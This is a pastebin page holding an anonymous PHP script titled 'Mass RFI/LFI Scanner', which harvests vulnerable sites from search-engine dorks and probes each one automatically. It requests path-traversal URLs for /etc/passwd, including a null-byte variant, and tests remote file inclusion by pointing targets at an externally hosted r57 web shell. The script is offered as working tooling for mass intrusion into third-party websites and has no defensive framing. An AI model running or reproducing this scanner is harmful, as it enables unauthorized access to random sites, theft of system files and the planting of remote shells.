Neue Pastes
- ohne Titel 2012-05-18 09:36:24
- ohne Titel 2012-05-18 09:31:02
- ohne Titel 2012-05-18 08:29:51
- ohne Titel 2012-05-18 01:36:27
- ohne Titel 2012-05-18 00:22:28
- ohne Titel 2012-05-18 00:22:04
- ohne Titel 2012-05-18 00:12:41
- ohne Titel 2012-05-17 21:52:16
- ohne Titel 2012-05-17 21:43:12
- ohne Titel 2012-05-17 21:04:24
Paste von Anonym am 2012-01-28 05:58:30 Syntax:
<?php
# Mass RFI/LFI Scanner NEW - (Startpagina[GOOGLE])
# Coded by MiyaChung
# MiyaChung@hotmail.com
# 19.11.2010
# I Love You Google
ob_start();
set_time_limit(0);
echo '<center><title>Mass RFI/LFI Scanner NEW - Startpagina [MiyaChung]</title>
<form method="post" action="">
<textarea name="dork" cols="35" rows="5"></textarea><br>
<input type="submit" name="scan" value="Scan">
</form>
</center>';
if(! $_POST['dork']==""){
function google($dork,$page){
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,'http://startgoogle.startpagina.nl/?q='.$dork.'&start='.$page.'&source=web');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
for($id=1 ; $id<=30; $id++){
$page=$id*10;
$gogil=explode("\n",$_POST['dork']);
foreach($gogil as $gogo){
$gogo=trim($gogo);
$google = google($gogo,$page);
$reg = '#<font color="\#008000"\>(.*?)</font>#si';
preg_match_all($reg,$google,$cikti);
foreach($cikti[0] as $site){
$site=trim($site);
$site=explode("-",$site);
$site=explode("=",$site[0]);
$site=ereg_replace('"#008000">','',$site[1]);
$site=$site."=";
echo '<center><b>Scanning URL : '.$site.'</b></center>';
ob_flush();
flush();
//LFI 1 Scan
$bag1=$site."../../../../../../../../../../../../../../../../../../../../etc/passwd";
$ch1=curl_init();
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch1,CURLOPT_URL,$bag1);
curl_setopt($ch1,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
curl_setopt($ch1,CURLOPT_TIMEOUT,'5');
$ex1=curl_exec($ch1);
if(eregi('root:x:',$ex1)){
echo '<center><b><font color="red">LFI Found : <a href="'.$bag1.'">'.$bag1.'</a></b></font></center>';
ob_flush();
flush();
}
//LFI 2 Scan
$bag2=$site."../../../../../../../../../../../../../../../../../../../../etc/passwd%00";
$ch2=curl_init();
curl_setopt($ch2,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch2,CURLOPT_URL,$bag2);
curl_setopt($ch2,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
curl_setopt($ch2,CURLOPT_TIMEOUT,'5');
$ex2=curl_exec($ch2);
if(eregi('root:x:',$ex2)){
echo '<center><b><font color="red">LFI Found : <a href="'.$bag2.'">'.$bag2.'</a></b></font></center>';
ob_flush();
flush();
}
//RFI Scan
$bag3=$site.'http://www.gloi.org/r57.txt?'; // YOUR SHELL
$ch3=curl_init();
curl_setopt($ch3,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch3,CURLOPT_URL,$bag3);
curl_setopt($ch3,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
curl_setopt($ch3,CURLOPT_TIMEOUT,'5');
$ex3=curl_exec($ch3);
if(eregi('uname',$ex3)){
echo '<center><b><font color="blue">RFI Found : <a href="'.$bag3.'">'.$bag3.'</a></b></font></center>';
ob_flush();
flush();
}
}
}
}
}
?>
» ohne Titel
« ohne Titel
